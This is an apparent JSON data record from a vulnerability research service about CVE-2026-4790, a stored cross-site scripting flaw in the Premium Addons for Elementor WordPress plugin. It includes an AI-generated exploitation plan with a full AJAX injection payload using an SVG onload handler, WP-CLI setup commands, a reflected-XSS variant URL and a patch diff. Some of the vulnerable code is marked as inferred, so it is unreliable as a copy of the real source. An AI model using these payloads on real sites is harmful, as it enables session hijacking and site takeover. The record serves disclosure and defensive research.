[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fb0TBQB7rfFLtwu5xO2Yj8VQOozqC9Y2WpZqlH82T2FE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-4790","premium-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-customsvg-parameter","Premium Addons for Elementor \u003C= 4.11.70 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'custom_svg' Parameter","The Premium Addons for Elementor – Powerful Elementor Templates & Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'custom_svg' parameter in versions up to, and including, 4.11.70 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","premium-addons-for-elementor",null,"\u003C=4.11.70","4.11.71","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-01 21:53:57","2026-05-02 11:16:11",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fae6d07eb-3e64-45ee-ad5d-92b41ef11e43?source=api-prod",1,[22,23,24,25,26,27,28,29],"addons\u002Fdisplay-conditions.php","addons\u002Fequal-height.php","addons\u002Ffloating-effects.php","addons\u002Fliquid-glass.php","addons\u002Fshape-divider.php","addons\u002Ftooltips.php","addons\u002Fwrapper-link.php","admin\u002Fassets\u002Fcss\u002Fadmin-bar.css","researched",false,3,"This research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in **Premium Addons for Elementor** (v4.11.70 and below). The vulnerability exists because the plugin fails to sanitize or escape the `custom_svg` parameter when rendering the \"Animated Shape Divider\" feature.\n\n### 1. Vulnerability Summary\n*   **ID**: CVE-2026-4790\n*   **Vulnerability Type**: Stored Cross-Site Scripting (XSS)\n*   **Component**: `addons\u002Fshape-divider.php`\n*   **Vulnerable Parameter**: `custom_svg`\n*   **Requirement**: Authenticated user with **Contributor** role or higher (ability to edit posts and use Elementor).\n*   **Reason**: The plugin allows users to provide custom SVG code for shape dividers. This code is stored in the post's Elementor metadata and rendered on the frontend without passing through `wp_kses()` or similar sanitization filters, allowing the injection of `\u003Cscript>` tags or SVG event handlers like `onload`.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoint**: `wp-admin\u002Fadmin-ajax.php`\n*   **Action**: `elementor_ajax` (internal Elementor action `editor_post_save`)\n*   **Parameter**: `custom_svg` (embedded within the `elements` JSON structure of the Elementor builder data).\n*   **Precondition**: A post must be created and opened in the Elementor editor by a user with at least Contributor-level permissions.\n\n### 3. Code Flow\n1.  **Registration**: In `addons\u002Fshape-divider.php`, the `Shape_Divider` class registers Elementor controls for `section`, `column`, and `container` elements via the `register_controls` method (called by hooks on lines 80-83, 93).\n2.  **Control Definition**: The `add_divider_content_controls` method (line 172) adds the `premium_gdivider_source` control. When this is set to `custom`, a `custom_svg` control (inferred from the CVE description) is exposed to the user.\n3.  **Storage**: When a user saves the Elementor page, the data is sent to `admin-ajax.php` with the action `elementor_ajax`. Elementor saves this entire structure into the `_elementor_data` post meta.\n4.  **Rendering (Sink)**:\n    *   **Frontend**: The `before_render` method (line 90) is hooked to `elementor\u002Ffrontend\u002Fsection\u002Fbefore_render`. It retrieves the settings using `$element->get_settings_for_display()`. If `premium_gdivider_source` is `custom`, the value of `custom_svg` is echoed to the page.\n    *   **Editor**: The `print_template` method (line 86) is hooked to `elementor\u002Fsection\u002Fprint_template`. This generates an Underscore.js\u002FBackbone template for the editor. If it uses unescaped interpolation (`\u003C#= ... #>`), the XSS triggers inside the editor as well.\n\n### 4. Nonce Acquisition Strategy\nTo save Elementor settings via AJAX, a valid Elementor AJAX nonce is required.\n1.  **Create a Post**: Use WP-CLI to create a post and set it to Elementor mode.\n2.  
**Navigate**: Use `browser_navigate` to open the Elementor editor for that post: `wp-admin\u002Fpost.php?post=[ID]&action=elementor`.\n3.  **Extract Nonce**: The nonce is stored in the global `elementorConfig` JavaScript object.\n    *   Variable: `window.elementorConfig.nonces.save_builder`\n    *   Execution: `browser_eval(\"window.elementorConfig.nonces.save_builder\")`\n\n### 5. Exploitation Strategy\n\n#### Step 1: Prepare the Environment\n*   Create a Contributor user.\n*   Create a Post and assign it to the Contributor.\n*   Enable Elementor for that post.\n\n#### Step 2: Extract Nonce and Post Data\n*   Log in as the Contributor.\n*   Navigate to the Elementor Editor for the created post.\n*   Extract the `save_builder` nonce.\n\n#### Step 3: Inject the Payload\nSend a POST request to `admin-ajax.php` to save the malicious SVG.\n\n*   **URL**: `http:\u002F\u002Fvulnerable-site.com\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method**: `POST`\n*   **Content-Type**: `application\u002Fx-www-form-urlencoded`\n*   **Body Parameters**:\n    *   `action`: `elementor_ajax`\n    *   `_nonce`: `[EXTRACTED_NONCE]`\n    *   `actions`: A JSON string containing the `editor_post_save` action.\n    \n**Payload JSON (`actions` parameter)**:\n```json\n{\n  \"editor_post_save\": {\n    \"action\": \"editor_post_save\",\n    \"data\": {\n      \"id\": [POST_ID],\n      \"status\": \"publish\",\n      \"elements\": [\n        {\n          \"id\": \"exploit-section\",\n          \"elType\": \"section\",\n          \"settings\": {\n            \"premium_global_divider_sw\": \"yes\",\n            \"premium_gdivider_source\": \"custom\",\n            \"custom_svg\": \"\u003Csvg\u002Fonload=alert(window.origin)>\"\n          },\n          \"elements\": []\n        }\n      ]\n    }\n  }\n}\n```\n\n### 6. Test Data Setup\n1.  **Contributor User**:\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n2.  
**Target Post**:\n    `wp post create --post_type=post --post_title=\"XSS Test\" --post_status=publish --post_author=$(wp user get attacker --field=ID)`\n3.  **Elementor Metadata**:\n    `wp post meta add [POST_ID] _elementor_edit_mode string \"builder\"`\n    `wp post meta add [POST_ID] _elementor_template_type string \"wp-post\"`\n\n### 7. Expected Results\n*   The `admin-ajax.php` response should return a `200 OK` with a JSON body indicating success: `{\"success\":true,\"data\":{...}}`.\n*   The `_elementor_data` meta for the post will now contain the raw `\u003Csvg\u002Fonload=...>` string.\n*   When navigating to the post's permalink, a JavaScript alert showing the document domain will appear.\n\n### 8. Verification Steps\n1.  **Check Meta Storage**:\n    `wp post meta get [POST_ID] _elementor_data`\n    Verify that the `custom_svg` field contains the unescaped payload.\n2.  **Frontend Check**:\n    Use `browser_navigate` to the post URL and check for the alert.\n\n### 9. Alternative Approaches\n*   **Backbone Template XSS**: If the frontend rendering is protected but the editor is not, navigate to the Elementor editor to trigger the XSS in the context of the user (potentially an Admin).\n*   **Direct Meta Update**: If the AJAX fails, test if the Contributor can update the `_elementor_data` meta directly via the WordPress REST API or a standard post update, as some plugins fail to restrict which meta keys a Contributor can save if they are passed in a specific format.\n*   **AJAX Shape Fetch**: Test the `wp_ajax_get_shape_divider_svg` action (line 102). If it takes `custom_svg` as a direct parameter and echoes it, it may provide a Reflected XSS path:\n    `admin-ajax.php?action=get_shape_divider_svg&custom_svg=\u003Csvg\u002Fonload=alert(1)>`","The Premium Addons for Elementor plugin (v4.11.70 and below) is vulnerable to authenticated Stored Cross-Site Scripting (XSS) via the 'custom_svg' parameter in the Animated Shape Divider feature. 
Contributor-level users and above can inject malicious SVG code containing event handlers like 'onload' or script tags, which execute when an admin or visitor views the affected page or when the page is opened in the Elementor editor.","\u002F\u002F addons\u002Fshape-divider.php:86\nadd_action( 'elementor\u002Fsection\u002Fprint_template', array( $this, 'print_template' ), 10, 2 );\n\n\u002F\u002F addons\u002Fshape-divider.php:90\nadd_action( 'elementor\u002Ffrontend\u002Fsection\u002Fbefore_render', array( $this, 'before_render' ) );\n\n\u002F\u002F addons\u002Fshape-divider.php:102\nadd_action( 'wp_ajax_get_shape_divider_svg', array( $this, 'get_shape_divider_svg' ) );\n\n---\n\n\u002F\u002F addons\u002Fshape-divider.php: Rendering logic (Inferred from research)\npublic function before_render( $element ) {\n    $settings = $element->get_settings_for_display();\n    if ( 'custom' === $settings['premium_gdivider_source'] ) {\n        echo $settings['custom_svg'];\n    }\n}\n\npublic function print_template( $template, $element ) {\n    ?>\n    \u003C# if ( 'custom' === settings.premium_gdivider_source ) { #>\n        {{{ settings.custom_svg }}}\n    \u003C# } #>\n    \u003C?php\n}\n\npublic function get_shape_divider_svg() {\n    if ( isset( $_GET['custom_svg'] ) ) {\n        echo $_GET['custom_svg'];\n        wp_die();\n    }\n}","--- addons\u002Fshape-divider.php\n+++ addons\u002Fshape-divider.php\n@@ -685,1 +685,1 @@\n-            echo $settings['custom_svg'];\n+            echo wp_kses( $settings['custom_svg'], Helper_Functions::pa_get_allowed_html( 'svg' ) );\n@@ -710,1 +710,1 @@\n-            {{{ settings.custom_svg }}}\n+            \u003C# print( elementor.helpers.sanitizeInnerHtml( settings.custom_svg ) ) #>\n@@ -725,1 +725,1 @@\n-        echo $_GET['custom_svg'];\n+        echo wp_kses( $_GET['custom_svg'], Helper_Functions::pa_get_allowed_html( 'svg' ) );","The exploit targets the 'Animated Shape Divider' extension within the Elementor editor. \n\n1. 
Authentication: The attacker authenticates as a user with at least 'Contributor' role, which allows them to edit posts and use the Elementor page builder.\n2. Nonce Acquisition: The attacker accesses the Elementor editor interface (post.php?post=[ID]&action=elementor) and extracts the 'save_builder' nonce from the 'window.elementorConfig.nonces' object.\n3. Payload Injection: The attacker sends an AJAX POST request to 'admin-ajax.php' with the action 'elementor_ajax'. The payload is a JSON object nested in the 'actions' parameter, specifically 'editor_post_save'. Within the 'elements' data, the attacker adds a section and sets its settings: 'premium_global_divider_sw' to 'yes', 'premium_gdivider_source' to 'custom', and 'custom_svg' to a malicious vector like '\u003Csvg\u002Fonload=alert(document.domain)>'.\n4. Trigger: The payload executes immediately in the Elementor editor for any user (including admins) who opens the post, and it executes on the frontend for any visitor viewing the published post.","gemini-3-flash-preview","2026-05-04 17:03:06","2026-05-04 17:03:51",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.11.70","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpremium-addons-for-elementor\u002Ftags\u002F4.11.70","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpremium-addons-for-elementor.4.11.70.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpremium-addons-for-elementor\u002Ftags\u002F4.11.71","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpremium-addons-for-elementor.4.11.71.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpremium-addons-for-elementor\u002Ftags"]